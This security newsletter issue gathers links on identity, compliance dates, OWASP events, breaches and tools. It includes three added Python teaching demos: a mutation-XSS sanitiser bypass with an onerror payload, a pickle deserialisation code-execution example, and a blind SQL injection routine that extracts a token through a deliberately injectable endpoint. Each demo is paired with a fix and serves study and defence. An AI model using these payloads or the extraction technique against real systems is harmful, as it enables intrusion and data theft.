Security Stack Sheet #71

Word of the week

“Identity is the new perimeter”


“I have a dream”: not quoting Martin Luther King, or ABBA for that matter, but most CIOs or CTOs in this case.

Is there a place to discuss the Cloud Access Security Broker, the positioning of the firewall inspecting outbound traffic, and the position of Secure Internet Gateways? Certainly; however, let’s walk before we run. There is a solid argument that once the three focus areas are implemented maturely within an organisation that understands its risks and has remediation plans for them, most of those risks become improbable.

Do not allow identity to evaporate your Cloud dream

Links HERE and HERE and HERE and HERE

Word of the week special

“Should we blame people for cyber security errors?”

In certain circumstances the responsibility for managing risk is thrown back upon the individual. Margaret Thatcher famously blamed a large proportion of Britain’s record crime rates on the victims’ carelessness: ‘we have to be careful that we ourselves don’t make it easy for the criminal’.


Link HERE and Why Creating a Culture of Security Awareness is Crucial in Tackling Insider Threat is HERE

AND

“AgileFall” – When Waterfall Sneaks Back Into Agile

  • AgileFall is a seductive trap – using some Lean processes but retaining the onerous parts of Waterfall
  • The goal of leadership in Lean product management is not to push the paperwork down. It’s to push an outcome orientation down and translate its progress back up the chain

Link HERE

AND

Who is Responsible for Internet Architecture Security? 

Witnesses at a September 10 House Armed Services Committee hearing on Securing the Nation’s Internet Architecture included Jeanette Manfra, Assistant Director for Cybersecurity at the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency; Diane Rinaldo, Acting Assistant Secretary and Administrator at the Department of Commerce’s National Telecommunications and Information Administration; and Ed Wilson, Deputy Assistant Secretary for Cyber Policy at the Department of Defense’s Office of the Undersecretary of Defense for Policy. Subcommittee Chairman Jim Langevin (D-Rhode Island) noted that while various agencies have laid claim to distinct aspects of cyber policy, no single entity has responsibility for the security of Internet architecture, and said, “I’m very worried that by carving out discrete lanes in the road, there are seams left unaddressed in the middle, and I’m concerned that internet architecture security is one of those seam issues.”

Link HERE

Bonus


Link HERE


Link HERE


Thanks to Andi

If you missed this in the previous Sheet

Crypto challenge of the week

Starting Next Week!


Link HERE Prepare yourself from HERE

 

Dates

  • May 25th 2019: 1 year of GDPR Live! See incidents section below

GDPR Enforcement Tracker

Link HERE – thanks to Marius

  • 1st January 2020 – The California Consumer Privacy Act (CCPA) becomes effective


Link HERE

  • June 30th 2018: PCI DSS deadline to stop using SSL and early TLS (TLS 1.0). TLS 1.1 or higher is mandatory for compliance, with TLS 1.2 strongly recommended  BEWARE!

Link HERE

  • Now: TLS1.2 mandatory for proper security

HTTPS everywhere HERE

  • Halloween Brexit! or later or not or bust


Link HERE

  • September 2019: PSD2 security

PSD2’s Strong Customer Authentication requirements will not come fully into force in every European country in September 2019.

France has just postponed application to 2022 (here from the Banque de France, with approval there from the European Banking Authority); it’s not crystal clear, but this is also reported in the French financial press.

The UK has done the same, with an 18-month delay (here from the Financial Conduct Authority).

Germany is in a similar situation; no source available.

Thanks to Christophe.

  • November 3rd 2020: US presidential election (Trump’s bid for a second term)
  • 2022 – First trip to Mars according to Elon Musk
  • 2024 – Back to the Moon according to Trump and NASA

Book of the month

Hacking Security e-books

Link HERE

Comic of the week


##Some OWASP stuff first

-Pushing Left, Like a Boss – Part 8: Testing

Testing can happen as soon as you have something to test.

Link HERE

-AppSec podcast: Brook Schoenfield — Security is a messy problem

Brook Schoenfield is a Master Security Architect @IOActive and author of Securing Systems, as well as an industry leader in security architecture and threat modeling, and a friend.

“We have a static analysis tool. Why do we need a program?” This is what Brook overheard at one point in his past, from a company CTO, and it sums up the program issue. The CTO was trying to drive a technical strategy for an entire company, and security was just one piece of that. A mandate or a tool would have made life so easy.

Brook takes us on a journey based on his experience building programs, with advice, stories, comments, and quotes. We talk about architecture, culture, mindset, tools, compilers and so much more.

Catch Brook’s next book, “Secrets of a Cyber Security Architect” which arrives in Fall 2019

Link HERE

-Remember: API Security Checklist

Checklist of the most important security countermeasures when designing, testing, and releasing your API

Link HERE and THE DARK SIDE OF APIS: DENIAL OF SERVICE ATTACKS Link HERE

-10 Java security best practices

Link HERE


plus 5 Security Best Practices for Java HERE and for background the screenshot HERE

-Gartner: Application security programs coming up short

At the 2019 Gartner Security and Risk Management Summit, experts discussed how enterprise application security efforts are falling short and what can be done about it

Link HERE

Link HERE


Link HERE

 

Events

OWASP events HERE

All InfoSec events HERE

The complete Security Events calendar – Peerlyst

Link HERE

OWASP London event 19th of September

  • “Hack the World & Galaxy with OSINT” – Chris Kubecka
  • Lightning Talk – “Using OWASP Security Bot (OSBot) to make Fact Based Security Decisions” – Dinis Cruz
  • “Common API Security Pitfalls” – Philippe De Ryck

Link with video presentation and PDFs HERE


Link HERE

Security BSides London 2019 – Bug Bounties: Crowdsourcing Nosey Bastards – Jamie O’Hare

Bug Bounties have emerged in recent years, marketed as a silver bullet solution to an organisation’s external security; however, there are hidden depths beyond publishing a scope. By the end of this talk (hopefully) you’ll be able to answer: Are more eyes necessarily better? What are the intricacies of project-specific and non-project-specific hunters? And most puzzlingly, what does the city of St Petersburg have to do with Bug Bounties?

Link HERE

How to secure app pipelines in AWS – 26th September 2019

Link HERE

Cyber security: Beyond the Headlines | 2019

Link HERE

 

Incidents

Global ALERT level

BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred. 


Incident data HERE Find your country


NCSC Weekly Threat Report


Ecuador data breach affects millions

Ecuador suffered the biggest data breach in its history this week after the records of most of its population were exposed online.
The leak, reported by ZDNet, occurred after a data analytics company left a server exposed without a password, meaning anyone could access the data.
The data included the personal information of 20.8m Ecuadorian citizens as well as financial and car ownership records.

LastPass patches recent credentials vulnerability

LastPass, a freemium password manager, has released an update to fix a vulnerability which could expose the credentials most recently filled on a previously visited website.

The fix in LastPass version 4.33.0 was released last week and users should update to this version as soon as possible. LastPass also highlighted in a blog post that the bug only affects the Chrome and Opera browser extensions.

Link HERE

Troy Hunt newsletter

Link HERE

Incidents & events detail

Password-exposing bug purged from LastPass extensions

Google Project Zero finds and reports flaw in widely used password manager

Link HERE

CVE-2019-10392 — Yet Another 2k19 Authenticated Remote Command Execution in Jenkins

From iwantmore.pizza

Link HERE

Vulnerability Spotlight: Multiple vulnerabilities in Atlassian Jira

Link HERE

Web Attacks Focus on SQL Injection, Malware on Credentials

Attackers continue to focus on bread-and-butter tactics, according to a quarterly threat report

Link HERE

iOS 13 exploit bypasses the lockscreen for access to contacts

Security flaw should be fixed in iOS 13.1

Link HERE

AWS billing error overcharges cloud customers

Link HERE

A gentle introduction to Linux Kernel fuzzing – from Cloudflare

Link HERE

CafePress finally warns customers that it was hacked

Link HERE

1-Click iPhone and Android Exploits Target Tibetan Users via WhatsApp


Link HERE

The Air Force Will Let Hackers Try to Hijack an Orbiting Satellite

At the Defcon hacking conference next year, the Air Force will bring a satellite for fun and glory

Link HERE

Digital Certificates – Models for Trust and Targets for Misuse

Blog 6: A new kind of certificate fraud: Executive impersonation

Link HERE

Mind Tricks CISOs Already Know — A Methodology for Delivering Effective Communication

Link HERE

Windows 10: Has Microsoft cleaned up its update mess? (Spoiler: Maybe)

After its botched release of the version 1809 update for Windows 10 last year, Microsoft instituted a sweeping series of changes to Windows Update. Don’t be fooled by the headlines: A close look at recent issues with version 1903 suggests those changes are paying off

Link HERE

Research of the week

Featuring Hype Cycle for Cloud Security, 2019

Security continues to be the most commonly cited reason for avoiding use of the public cloud, but consensus is growing that public cloud can be made secure enough for an increasing number of use cases. Mature cloud service providers (CSPs) are only very rarely suffering security failures that directly affect their customers; but customers of these services often do not yet know how to use them securely. The multiple security tools contained within this Hype Cycle strongly suggest that cloud-using organizations are not always finding CSP-provided security mechanisms to be adequate. Security professionals who can reorient their role around “business enablement” will find that their technical, conceptual and practical experiences make them ideally suited to help their organizations make controlled, compliant and economical use of the public cloud. This Hype Cycle provides a summary of the most important new mechanisms that will enable that mission

Link HERE

WOW: Write-up of DOMPurify 2.0.0 bypass using mutation XSS

Yesterday, a new version of DOMPurify (a very popular XSS sanitization library) was released, which fixed a bypass reported by us. In this post I’ll show what exactly the bypass looked like, preceded by general information about DOMPurify and how it works. If you are aware of how purifiers work and what mXSS is, you can skip directly to the paragraph mXSS in Chromium (and Safari)

Link HERE
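The write-up above relies on a browser-specific parsing quirk, so the actual bypass cannot be reproduced outside Chromium or Safari. The following is an added toy model, not DOMPurify’s code and not the bypass from the post: it shows the mechanism every mXSS shares (a sanitiser parses, filters and serialises; the browser re-parses, and if serialise-then-parse is not the identity the sanitiser’s tree and the browser’s tree differ) using a deliberately buggy, hypothetical serialiser that omits attribute quotes, beside a correct one, plus the fixed-point check (sanitise twice, compare) that catches such mutations. The tag allow-list, the names and the payload are all constructed for the demo.

```python
"""Toy model of mutation XSS (mXSS), added as an illustration; it is not
DOMPurify's code and does not reproduce the Chromium/Safari quirk in the
write-up.  A DOM-based sanitiser parses, filters, then serialises; the browser
re-parses that output.  If serialise->parse is not the identity, a value that
was a harmless attribute in the sanitiser's tree can become an event handler in
the browser's tree.  Names and the payload below are constructed for the demo."""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "a", "img"}
ALLOWED_ATTRS = {"href", "src", "alt", "title"}


class _EventCollector(HTMLParser):
    """Flattens markup into ('start', tag, attrs) / ('end', tag) / ('text', s)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.events = []

    def handle_starttag(self, tag, attrs):
        self.events.append(("start", tag, [(k, v or "") for k, v in attrs]))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        self.events.append(("end", tag))

    def handle_data(self, data):
        self.events.append(("text", data))


def parse(markup):
    collector = _EventCollector()
    collector.feed(markup)
    collector.close()
    return collector.events


def serialize_unquoted(events):
    """Hypothetical buggy serialiser: attribute values emitted without quotes
    (some historical browsers' innerHTML did this).  A value containing a
    space re-parses as several attributes."""
    out = []
    for ev in events:
        if ev[0] == "start":
            out.append("<%s%s>" % (ev[1], "".join(" %s=%s" % kv for kv in ev[2])))
        elif ev[0] == "end":
            out.append("</%s>" % ev[1])
        else:
            out.append(escape(ev[1], quote=False))
    return "".join(out)


def serialize_quoted(events):
    """Correct serialiser: every value quoted and escaped, so parse(serialize(t)) == t."""
    out = []
    for ev in events:
        if ev[0] == "start":
            attrs = "".join(' %s="%s"' % (k, escape(v, quote=True)) for k, v in ev[2])
            out.append("<%s%s>" % (ev[1], attrs))
        elif ev[0] == "end":
            out.append("</%s>" % ev[1])
        else:
            out.append(escape(ev[1], quote=False))
    return "".join(out)


def sanitize(markup, serializer):
    """Allow-list filter over the parsed tree, then hand the tree to a serialiser."""
    kept = []
    for ev in parse(markup):
        if ev[0] == "text":
            kept.append(ev)            # disallowed tags are dropped, their text is kept
        elif ev[1] in ALLOWED_TAGS:
            if ev[0] == "start":
                attrs = [(k, v) for k, v in ev[2]
                         if k in ALLOWED_ATTRS and not k.startswith("on")]
                kept.append(("start", ev[1], attrs))
            else:
                kept.append(ev)
    return serializer(kept)


def browser_sees_handler(markup):
    """Stand-in for the browser: after re-parsing, does any element carry an on* attribute?"""
    return any(ev[0] == "start" and any(k.startswith("on") for k, _ in ev[2])
               for ev in parse(markup))


def is_fixed_point(markup, serializer):
    """Cheap mXSS detector: a sound sanitiser is idempotent on its own output."""
    once = sanitize(markup, serializer)
    return sanitize(once, serializer) == once


# Constructed payload: the handler hides inside the value of an allowed attribute.
PAYLOAD = '<img alt="x onerror=alert(1)" src="x">'

if __name__ == "__main__":
    for name, ser in (("unquoted", serialize_unquoted), ("quoted", serialize_quoted)):
        out = sanitize(PAYLOAD, ser)
        print(name, out, "handler:", browser_sees_handler(out),
              "idempotent:", is_fixed_point(PAYLOAD, ser))
```

With the unquoted serialiser the sanitiser’s own tree never contains `onerror`, yet its output `<img alt=x onerror=alert(1) src=x>` does once the browser re-parses it; the quoted serialiser round-trips cleanly, and `is_fixed_point` flags the first and passes the second. Running a real sanitiser to a fixed point is a reasonable belt-and-braces control, but the real fix is a serialiser whose output the target parser reads back identically.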

2019 CWE Top 25 Most Dangerous Software Errors


Links HERE and HERE

Deserialization Bugs in the Wild

A totally unscientific analysis of deserialization vulns found in the wild

Link HERE
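As an added illustration of the bug class the analysis above counts (not code from that analysis), here is the smallest honest demonstration of why deserialising attacker bytes with a native format is code execution, and one containment pattern. Python’s pickle is used because it is the clearest case; the shape is the same for Java’s ObjectInputStream or PHP’s unserialize. The `Evil` class, `_record` sink and allow-list are constructed for the demo.

```python
"""Added illustration (not code from the linked analysis): native
deserialisation of untrusted bytes is remote code execution, and a
restricted unpickler is one way to contain it.  Everything here is
constructed for the demo."""
import io
import pickle

EXECUTED = []          # records side effects caused purely by unpickling


def _record(msg):
    """Stand-in for os.system / subprocess: proves the unpickler ran our callable."""
    EXECUTED.append(msg)
    return msg


class Evil:
    """Constructed attacker object.  pickle stores the (callable, args) pair
    from __reduce__ and the receiver calls it; no Evil instance is needed."""

    def __reduce__(self):
        return (_record, ("code executed during unpickling",))


def attack_payload():
    return pickle.dumps(Evil())


def benign_payload():
    return pickle.dumps({"user": "alice", "roles": {"admin"}})


def unsafe_load(data):
    """What most code does: fully trusting pickle.loads on attacker bytes."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Containment: only a fixed allow-list of module.name globals may be
    resolved, so the GLOBAL/STACK_GLOBAL opcodes cannot reach arbitrary callables."""

    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"),
               ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_safe_load(data):
    """Returns (ok, value-or-error-message) so callers can log rejected payloads."""
    try:
        return True, safe_load(data)
    except pickle.UnpicklingError as exc:
        return False, str(exc)


if __name__ == "__main__":
    payload = attack_payload()
    print("unsafe:", unsafe_load(payload), EXECUTED)
    EXECUTED.clear()
    print("restricted:", try_safe_load(payload), EXECUTED)
    print("benign:", try_safe_load(benign_payload()))
```

The allow-list works because pickle has to name every global it resolves; the same idea is what Java’s `ObjectInputFilter` and look-ahead deserialisation filters implement. Where the data format does not need object graphs at all, the stronger answer is to not use a native serialiser for untrusted input in the first place.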

Cloudflare’s Approach to Research


Link HERE

Tool of the week

Introducing LambdaGuard — a security scanner for AWS Lambda

We’ve built a tool which allows you to visualise and audit the security of your serverless assets — and now we’re open-sourcing it, too

Link HERE

Best Free Tools for Online Privacy

Link HERE

Resource: Security Monitoring and Attack Detection with ElasticSearch, Logstash and Kibana

Link HERE and what can go wrong HERE

Remember:


Link HERE

Kubernetes security best practices

Link HERE

 

Other interesting articles

##Remember: Why you need a password manager


Link HERE

 

##Different conferences, common theme: How to best manage the disparate security solutions we’re using

We need to unite the different islands of security solutions in both the physical and cyber worlds to provide the best level of protection

Link HERE and

Security Automation and the Coming Singularity is HERE and

Black Hat 2019: The Craziest, Most Terrifying Things We Saw is HERE

 

##JWT Exfiltration Optimization & Blind MySQLi

It was a bloody rainy day in mid-2013 when my teacher went over the term “Big O Notation” during the data structures class, back then at LIU university in Lebanon. I didn’t know that I’d fancy using it in my career, and I didn’t have the guts to use it then

Link HERE
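The Big O point in the post above, and the SQL injection headline in the incidents section, both come down to one practical question: how many requests does a boolean blind injection need to pull a secret out? The following is an added example, not the post’s own code: a constructed SQLite table and a deliberately injectable “does this user exist?” endpoint act as the oracle, a linear guess (one query per candidate character) is compared with a binary search on the character code (one query per bit), and the parameterised query that closes the hole is shown last. The token is JWT-shaped but made up; the query counts come from running the code.

```python
"""Added example (not the article's code): exfiltrating a secret through a
boolean blind SQL injection oracle, comparing a linear per-character guess
with a binary search over the character code, then the parameterised query
that closes the hole.  Table, token and endpoint are all constructed."""
import sqlite3
import string

SECRET_TOKEN = "eyJhbGciOiJIUzI1NiJ9.e30.abc"   # constructed, JWT-shaped, not a real token
ALPHABET = string.ascii_letters + string.digits + "-_."


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, token TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'alice', ?)", (SECRET_TOKEN,))
    return db


class VulnerableEndpoint:
    """Models a 'does this user exist?' API: `name` is concatenated into SQL
    and the caller learns only True/False, which is all an oracle needs."""

    def __init__(self, db):
        self.db = db
        self.queries = 0

    def exists(self, name):
        self.queries += 1
        sql = "SELECT 1 FROM users WHERE name = '%s'" % name   # deliberately injectable
        return self.db.execute(sql).fetchone() is not None


def ask(endpoint, condition):
    """Inject a boolean condition; the trailing -- comments out the closing quote."""
    return endpoint.exists("alice' AND %s -- " % condition)


def token_length(endpoint, max_len=4096):
    lo, hi = 0, max_len                  # invariant: lo <= length < hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if ask(endpoint, "length(token) >= %d" % mid):
            lo = mid
        else:
            hi = mid
    return lo


def extract_linear(endpoint, length):
    """O(|alphabet|) queries per character: try each candidate in turn."""
    out = []
    for pos in range(1, length + 1):
        for ch in ALPHABET:
            if ask(endpoint, "substr(token,%d,1) = '%s'" % (pos, ch)):
                out.append(ch)
                break
        else:
            raise ValueError("character at %d is outside ALPHABET" % pos)
    return "".join(out)


def extract_binary(endpoint, length):
    """O(log |alphabet|) queries per character: binary search on the code point."""
    out = []
    for pos in range(1, length + 1):
        lo, hi = 32, 127                 # printable ASCII; invariant: lo <= code < hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if ask(endpoint, "unicode(substr(token,%d,1)) >= %d" % (pos, mid)):
                lo = mid
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def safe_exists(db, name):
    """The fix: the value travels as a bound parameter, never as SQL text."""
    return db.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone() is not None


def compare_strategies():
    """Runs both extractions against fresh endpoints; returns {label: (recovered, queries)}."""
    results = {}
    for label, extractor in (("linear", extract_linear), ("binary", extract_binary)):
        ep = VulnerableEndpoint(build_db())
        recovered = extractor(ep, token_length(ep))
        results[label] = (recovered, ep.queries)
    return results


if __name__ == "__main__":
    for label, (recovered, queries) in compare_strategies().items():
        print("%-6s %4d queries -> %s" % (label, queries, recovered))
    db = build_db()
    print("parameterised:", safe_exists(db, "alice"), safe_exists(db, "alice' AND 1=1 -- "))
```

For a 28-character token the binary search needs about seven queries per character (log2 of the printable range, rounded up) plus twelve to learn the length, against several hundred for the linear scan; the gap grows with the alphabet, which is why real tooling such as sqlmap searches bitwise by default. On the defensive side the parameterised version returns False for the injected name because the whole string, quote and comment included, is compared as data.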

 

##And finally, California Wants to Stop Hackers from Taking Control of Smart Gadgets

A proposed state law would help bolster the security of internet-connected devices, but what’s really needed is federal action


Links HERE and HERE

AND

Ironically, Too Many Video Streaming Choices May Drive Users Back To Piracy

Link HERE

##HACKING, TOOLS and FUN – CHECK BELOW!

AppSec Ezine

Must see

URL: https://habr.com/en/post/466801/

Description: Bypassing LinkedIn Search Limit by Playing With API.

URL: https://leucosite.com/Microsoft-Edge-uXSS/

Description: Microsoft Edge – Universal XSS (uXSS) (CVE-2019-1030).

URL: https://www.komodosec.com/post/an-accidental-ssrf-honeypot-in-google-calendar

Description: An Accidental “SSRF” Honeypot in Google Calendar.

Link HERE and credits to HERE

 

 
